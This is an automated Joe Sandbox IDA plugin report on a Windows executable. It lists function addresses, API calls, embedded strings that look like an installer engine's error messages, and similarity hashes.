• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: AddressErrorLastProc$HandleHeapInformationModule
• String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
• API String ID: 3104334766-1824683568
• Opcode ID: e1c1df447bd253b4d77c95d7cd3d4fa530df67da478942a8a7343a531fae9e1e
• Instruction ID: 75117b2ad15c25deb94f0a2e76d2b54a5b42ca7aa0a06289393517848c76e194
• Opcode Fuzzy Hash: e1c1df447bd253b4d77c95d7cd3d4fa530df67da478942a8a7343a531fae9e1e
• Instruction Fuzzy Hash: 6B01B13120021ABBD7606BA69C49E6F7B5CFF42760B048029FE25D2241EB78DA01CBF0
APIs
• EnterCriticalSection.KERNEL32(?), ref: 007DF64E
• LeaveCriticalSection.KERNEL32(?), ref: 007DF7C9
Strings
• UX denied while trying to set download URL on embedded payload: %ls, xrefs: 007DF6B9
• UX requested unknown container with id: %ls, xrefs: 007DF6F3
• UX did not provide container or payload id., xrefs: 007DF7B8
• Failed to set download password., xrefs: 007DF777
• Failed to set download URL., xrefs: 007DF728
• Engine is active, cannot change engine state., xrefs: 007DF668
• UX requested unknown payload with id: %ls, xrefs: 007DF6A3
• Failed to set download user., xrefs: 007DF751
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
• API String ID: 3168844106-2615595102
• Opcode ID: 2cfb1d6744e3c6f75e11d9f6781e91b6f27e1c3ec5f57abae3a04f861ea0eee6
• Instruction ID: 65924e20bac28d376b97cafbb15c2146dc18c600015b5dda3ca57b67f5822de0
• Opcode Fuzzy Hash: 2cfb1d6744e3c6f75e11d9f6781e91b6f27e1c3ec5f57abae3a04f861ea0eee6
• Instruction Fuzzy Hash: A941B472501611EBCB219E24CC45FAAB7B8FF10730B55412BE816EB390EB7DDD508B91
APIs
                                                                                                                                                              • CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,00000410,000000FF,?,00000000,00000000), ref: 00805A9B
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00805AA9
                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 00805AEA
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00805AF7
                                                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00805C6A
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00805C79
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
• String ID: GET$dlutil.cpp
• API String ID: 2028584396-3303425918
• Opcode ID: a36d75601f0e1a8d2ff24d4cd7e990f830a62dd862fce399fefb4e5fe8849d6b
• Instruction ID: fd448fbc4a0268f16108b560990fbf0b5ddf9e194217aff977b01cb439dfda2f
• Opcode Fuzzy Hash: a36d75601f0e1a8d2ff24d4cd7e990f830a62dd862fce399fefb4e5fe8849d6b
• Instruction Fuzzy Hash: D0613B72A0061AABDBA1CFA4CC45BAF7BB8FF48764F154119FD15F6280E77099409FA0
APIs
  • Part of subcall function 007D1020: CompareStringW.KERNEL32(00000000,00000000,feclient.dll,000000FF,00000000,000000FF,00000000,00000000,?,?,007D0C6F,?,00000000,?,00000000,00000000), ref: 007D104F
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,00000000,?,00000000,00000001,?,?,00000000,?,00000000), ref: 007D0DF3
• GetLastError.KERNEL32 ref: 007D0E00
Strings
• Failed to create syncpoint event., xrefs: 007D0E2E
• Failed to append rollback cache action., xrefs: 007D0CCF
• Failed to append package start action., xrefs: 007D0C95
• plan.cpp, xrefs: 007D0E24
• Failed to append payload cache action., xrefs: 007D0DAA
• Failed to append cache action., xrefs: 007D0D4A
Similarity
• API ID: CompareCreateErrorEventLastString
• String ID: Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
• API String ID: 801187047-2489563283
• Opcode ID: f4bffbb51d0247d5e45393a0b605158645c43419fd5b59cbcabbed8e9bf5c5a6
• Instruction ID: 7776a1e50116831083cc152a307dda5c9da4f5629808f7df4ebd7e248d885e78
• Opcode Fuzzy Hash: f4bffbb51d0247d5e45393a0b605158645c43419fd5b59cbcabbed8e9bf5c5a6
• Instruction Fuzzy Hash: A2616175500605EFCB15DF58C980AAABBFAFF84310F21845BE9199B311EB35EE41DB90
APIs
• CompareStringW.KERNEL32(0000007F,00000000,74DEDFD0,000000FF,type,000000FF,?,74DEDFD0,74DEDFD0,74DEDFD0), ref: 00806F55
• SysFreeString.OLEAUT32(00000000), ref: 00806FA0
• SysFreeString.OLEAUT32(00000000), ref: 0080701C
• SysFreeString.OLEAUT32(00000000), ref: 00807068
Similarity
• API ID: String$Free$Compare
• String ID: `<u$type$url
• API String ID: 1324494773-1686489133
• Opcode ID: 835698cd3a3968bdf6962ac375629874304e56e310b37fcbd8b7a09fd4bc3b6c
• Instruction ID: ec9ac6aee68eddc6cd141e68c008f3366343bd5838c276d9b02d27c3a08559f0
• Opcode Fuzzy Hash: 835698cd3a3968bdf6962ac375629874304e56e310b37fcbd8b7a09fd4bc3b6c
• Instruction Fuzzy Hash: B2516F35D05219EFCB55DB94CC45EAEBBB8FF04711F1042A9E511EB2A0DB31AE10DB50
APIs
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,0080B500,00000000,?), ref: 007D06D3
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,0080B500,00000000,?), ref: 007D06E2
  • Part of subcall function 00800BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,007D061A,?,00000000,00020006), ref: 00800C0E
Strings
• Failed to delete registration key: %ls, xrefs: 007D0681
• %ls.RebootRequired, xrefs: 007D05F0
• Failed to update resume mode., xrefs: 007D06B7
• Failed to write volatile reboot required registry key., xrefs: 007D061E
• Failed to open registration key., xrefs: 007D071A
• crypt32.dll, xrefs: 007D05AC
Similarity
• API ID: Close$Create
• String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.$crypt32.dll
• API String ID: 359002179-3398658923
• Opcode ID: 7f89a8fb3b5d3806221442ab72b5a0290bd1b69bdbba8a102ff3e62e4b497136
• Instruction ID: 02f72da40fd8b4730792aa65bcd0368b3879cce78a9a0b607ed2e21e94b4cbda
• Opcode Fuzzy Hash: 7f89a8fb3b5d3806221442ab72b5a0290bd1b69bdbba8a102ff3e62e4b497136
• Instruction Fuzzy Hash: 8D418131900608FBDF22AE60DC0AFAF7BBAFF80310F14441AF515A1261D779DA60DB91
APIs
• CreateThread.KERNEL32(00000000,00000000,007DAD40,?,00000000,00000000), ref: 007DD2E9
• GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007DD2F5
  • Part of subcall function 007DCF25: WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,007DD365,00000000,?,?,007DC7C9,00000001,?,?,?,?,?), ref: 007DCF37
  • Part of subcall function 007DCF25: GetLastError.KERNEL32(?,?,007DD365,00000000,?,?,007DC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 007DCF41
• CloseHandle.KERNEL32(00000000,00000000,?,?,007DC7C9,00000001,?,?,?,?,?,00000000,00000000,?,?,?), ref: 007DD376
Similarity
• API ID: ErrorLast$CloseCreateHandleObjectSingleThreadWait
• String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$QE|$elevation.cpp$fT|
• API String ID: 3606931770-3326198951
• Opcode ID: 0286acfecfe80cb4cfeffad581c89fc103714fced0c85b2789077bf21cbe2768
• Instruction ID: 1530c6ddeee3f4a013713a8f1de7e7d8e89f1b470a9f70fd96ec37271f664def
• Opcode Fuzzy Hash: 0286acfecfe80cb4cfeffad581c89fc103714fced0c85b2789077bf21cbe2768
• Instruction Fuzzy Hash: 1541F2B6D01219EBCB11DFA9D8859DEBBF8FF08310F10412AF918E7340E774A9008BA5
APIs
• _MREFOpen@16.MSPDB140-MSVCRT ref: 007CF48A
  • Part of subcall function 007C4115: CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,007DA0E8,00000000,00000000,?,00000000,007C53BD,00000000,?,?,007CD5B5,?), ref: 007C4123
  • Part of subcall function 007C4115: GetLastError.KERNEL32(?,007DA0E8,00000000,00000000,?,00000000,007C53BD,00000000,?,?,007CD5B5,?,00000000,00000000), ref: 007C4131
• lstrlenA.KERNEL32(0080B500,00000000,00000094,00000000,00000094,?,?,007D04BF,swidtag,00000094,?,0080B518,007D04BF,00000000,?,00000000), ref: 007CF4DD
  • Part of subcall function 00804DB3: CreateFileW.KERNEL32(0080B500,40000000,00000001,00000000,00000002,00000080,00000000,007D04BF,00000000,?,007CF4F4,?,00000080,0080B500,00000000), ref: 00804DCB
  • Part of subcall function 00804DB3: GetLastError.KERNEL32(?,007CF4F4,?,00000080,0080B500,00000000,?,007D04BF,?,00000094,?,?,?,?,?,00000000), ref: 00804DD8
Strings
• Failed to allocate regid file path., xrefs: 007CF535
• Failed to format tag folder path., xrefs: 007CF543
• Failed to allocate regid folder path., xrefs: 007CF53C
• Failed to create regid folder: %ls, xrefs: 007CF525
• Failed to write tag xml to file: %ls, xrefs: 007CF51B
• swidtag, xrefs: 007CF49D
Similarity
• API ID: CreateErrorLast$DirectoryFileOpen@16lstrlen
• String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$swidtag
• API String ID: 904508749-1201533908
• Opcode ID: e01748c847f7ef0f3e93b1fbc1c9bbcab7163aa5b6fda316fac108a344842432
• Instruction ID: 1e48e26fc87ad17b55fc560a1bbd1a4a5b3bed0a5b9bb69050945af0de4f2a51
• Opcode Fuzzy Hash: e01748c847f7ef0f3e93b1fbc1c9bbcab7163aa5b6fda316fac108a344842432
• Instruction Fuzzy Hash: A5317E31D00619FBCF11AE98DC46F9DBBB5FF04710F10416DFA10E6251D7799AA0AB90
APIs
• WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,?,00000000,00000000,00000000,007C548E,00000000,00000000,?,00000000), ref: 007D548B
• GetLastError.KERNEL32(?,?,?,007C4C61,?,?,00000000,?,?,?,?,?,?,0080B4A0,?,?), ref: 007D5496
Strings
• Failed to post terminate message to child process., xrefs: 007D5476
• Failed to write restart to message buffer., xrefs: 007D542E
• Failed to post terminate message to child process cache thread., xrefs: 007D545A
• pipe.cpp, xrefs: 007D54BA
• Failed to wait for child process exit., xrefs: 007D54C4
• Failed to write exit code to message buffer., xrefs: 007D5406
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastObjectSingleWait
                                                                                                                                                              • String ID: Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
                                                                                                                                                              • API String ID: 1211598281-2161881128
                                                                                                                                                              • Opcode ID: 9314483127c2f4ac897fff5bcbcb70e7a1d2c07c192ae37c0751d10274a6e27b
                                                                                                                                                              • Instruction ID: 5949b9e3b73585a40780ced0d8ef055ef14476fa1ef8423179ac322d2255c7dc
                                                                                                                                                              • Opcode Fuzzy Hash: 9314483127c2f4ac897fff5bcbcb70e7a1d2c07c192ae37c0751d10274a6e27b
                                                                                                                                                              • Instruction Fuzzy Hash: 8B21D572940A69BBDF225A94DC05EDE7778FF00771F204213F910B6390D738AD9096E1
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,007D9F04,00000003,000007D0,00000003,?,000007D0), ref: 007D90B2
                                                                                                                                                              • GetLastError.KERNEL32(?,007D9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001,?), ref: 007D90BF
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,007D9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001), ref: 007D9187
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to open payload at path: %ls, xrefs: 007D9103
                                                                                                                                                              • Failed to verify signature of payload: %ls, xrefs: 007D912F
                                                                                                                                                              • cache.cpp, xrefs: 007D90F6
                                                                                                                                                              • Failed to verify catalog signature of payload: %ls, xrefs: 007D914E
                                                                                                                                                              • Failed to verify hash of payload: %ls, xrefs: 007D9172
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                              • String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
                                                                                                                                                              • API String ID: 2528220319-2757871984
                                                                                                                                                              • Opcode ID: ab4b532a700d5fc68e469174463122959801e7111eb01075f5fee0387a81cbc4
                                                                                                                                                              • Instruction ID: 3951116777c512b455a25c583bca9711bf19b3ec1f7e674896a30a43483aa6db
                                                                                                                                                              • Opcode Fuzzy Hash: ab4b532a700d5fc68e469174463122959801e7111eb01075f5fee0387a81cbc4
                                                                                                                                                              • Instruction Fuzzy Hash: E721A33654062BB7CB321A688C4DF9ABA39FF00760F114317FE1466390937A9C61EAD6
                                                                                                                                                              APIs
                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 007C6B69
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C6B73
                                                                                                                                                              • GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 007C6BB7
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C6BC1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$DirectoryNamePathVolumeWindows
                                                                                                                                                              • String ID: Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$variable.cpp
                                                                                                                                                              • API String ID: 124030351-4026719079
                                                                                                                                                              • Opcode ID: 45f7d5d3980de63262ed00b9fec22d3daeb709fb39d4b3b8fdc98f3ac46602e8
                                                                                                                                                              • Instruction ID: af97686eba0589f3364b1b7e3d9c775fdaa0e0c5de962754e9c979f91f09a612
                                                                                                                                                              • Opcode Fuzzy Hash: 45f7d5d3980de63262ed00b9fec22d3daeb709fb39d4b3b8fdc98f3ac46602e8
                                                                                                                                                              • Instruction Fuzzy Hash: C621B7B3E41239A7D7309B558D4AF9B77ACAB44B20F11416DBD04F7281E63CAD4046F5
                                                                                                                                                              APIs
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007C9C88
                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,000002C0,?,007CA895,00000100,000002C0,000002C0,?,000002C0), ref: 007C9CA0
                                                                                                                                                              • GetLastError.KERNEL32(?,007CA895,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 007C9CAB
                                                                                                                                                              Strings
                                                                                                                                                              • File search: %ls, did not find path: %ls, xrefs: 007C9CFD
                                                                                                                                                              • Failed get to file attributes. '%ls', xrefs: 007C9CE8
                                                                                                                                                              • search.cpp, xrefs: 007C9CDB
                                                                                                                                                              • Failed to set variable., xrefs: 007C9D2B
                                                                                                                                                              • Failed to format variable string., xrefs: 007C9C93
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                              • String ID: Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
                                                                                                                                                              • API String ID: 1811509786-2053429945
                                                                                                                                                              • Opcode ID: 5f299d5e904e25e9f5f409f459c8e5e7a9a3fa623da3b2747b48c5a329fcf794
                                                                                                                                                              • Instruction ID: a96448cba4ab7a3a16a0395fbccfcbdbe227fb7b3468a97369be99367cf82909
                                                                                                                                                              • Opcode Fuzzy Hash: 5f299d5e904e25e9f5f409f459c8e5e7a9a3fa623da3b2747b48c5a329fcf794
                                                                                                                                                              • Instruction Fuzzy Hash: A3210833A41524FADBA116A48C8EFAEB768FF11771F20022DFF15B61D0D7299D10A6E1
                                                                                                                                                              APIs
                                                                                                                                                              • TlsSetValue.KERNEL32(?,?), ref: 007DAD57
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007DAD61
                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000), ref: 007DADA0
                                                                                                                                                              • CoUninitialize.OLE32(?,007DC721,?,?), ref: 007DADDD
                                                                                                                                                              Strings
                                                                                                                                                              • elevation.cpp, xrefs: 007DAD85
                                                                                                                                                              • Failed to set elevated cache pipe into thread local storage for logging., xrefs: 007DAD8F
                                                                                                                                                              • Failed to initialize COM., xrefs: 007DADAC
                                                                                                                                                              • Failed to pump messages in child process., xrefs: 007DADCB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorInitializeLastUninitializeValue
                                                                                                                                                              • String ID: Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
                                                                                                                                                              • API String ID: 876858697-113251691
                                                                                                                                                              • Opcode ID: 86590761f44d2093236040f7315754f6642c9e064f7dc8493a03782f14606a9b
                                                                                                                                                              • Instruction ID: a5f071a1b7970ecb1fdbdd6502432c9ae450653c35a78788e627f794a1163fad
                                                                                                                                                              • Opcode Fuzzy Hash: 86590761f44d2093236040f7315754f6642c9e064f7dc8493a03782f14606a9b
                                                                                                                                                              • Instruction Fuzzy Hash: 0211E373A45635BBC72217549C0AD9EBEB8FF04B72B110117FD00B7750EB689D0096D2
                                                                                                                                                              APIs
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 007C5D68
                                                                                                                                                                • Part of subcall function 008010B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0080112B
                                                                                                                                                                • Part of subcall function 008010B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00801163
                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: QueryValue$Close
• String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
• API String ID: 1979452859-3209209246
• Opcode ID: 400ca159d9779990f5c1d8c990b3c25b6caa2f2bf9967ba1a9ea2bd92d971d2d
• Instruction ID: 291cb83c117a0b95dd80b2fa194268216a1c74d31792622e3a210e2b1067c0db
• Opcode Fuzzy Hash: 400ca159d9779990f5c1d8c990b3c25b6caa2f2bf9967ba1a9ea2bd92d971d2d
• Instruction Fuzzy Hash: B701F572B44B29F7CB6256D88C0AFAE7768EB00730F14425DF901FA2A1D77A9E409691
APIs
• SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 007EA33E
• GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 007EA348
Strings
• download, xrefs: 007EA308
• Failed to clear readonly bit on payload destination path: %ls, xrefs: 007EA377
• :, xrefs: 007EA3C1
• apply.cpp, xrefs: 007EA36C
• Failed attempt to download URL: '%ls' to: '%ls', xrefs: 007EA425
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: AttributesErrorFileLast
• String ID: :$Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$download
• API String ID: 1799206407-1905830404
• Opcode ID: 24e623f2ccd9876772f37eef45d43293725f07f20464e1c71f3793856c3b8f88
• Instruction ID: ec557c9a5c504d72e8fbe71702294f92b4e47288365b3b5716ab02a5830e39a1
• Opcode Fuzzy Hash: 24e623f2ccd9876772f37eef45d43293725f07f20464e1c71f3793856c3b8f88
• Instruction Fuzzy Hash: 0D519271A01255FBDB11DF9AC845EAEB7B9FF58710F108059E904EB240E379EA40CB92
APIs
  • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
  • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000410,?,?,007E9063,000002C0,00000100), ref: 008084F5
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,007E9063,000002C0,00000100,000002C0,000002C0,00000100,000002C0,00000410), ref: 00808510
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CompareHeapString$AllocateProcess
• String ID: application$apuputil.cpp$http://appsyndication.org/2006/appsyn$type
• API String ID: 2664528157-4206478990
• Opcode ID: a0e42e15f371709951a39b8151d9bfaa5be55061409f045b4c8e11cf21970cc6
• Instruction ID: 9417acbacafb8370a18d07d353d3efed7581ffc15a6a848270a9a37f76a0e485
• Opcode Fuzzy Hash: a0e42e15f371709951a39b8151d9bfaa5be55061409f045b4c8e11cf21970cc6
• Instruction Fuzzy Hash: 5751AF71644705EFDBA09F14CC86F1A7BA5FB10720F218618FAA5EB3D2DB75E9808B50
APIs
• GetLastError.KERNEL32 ref: 00806513
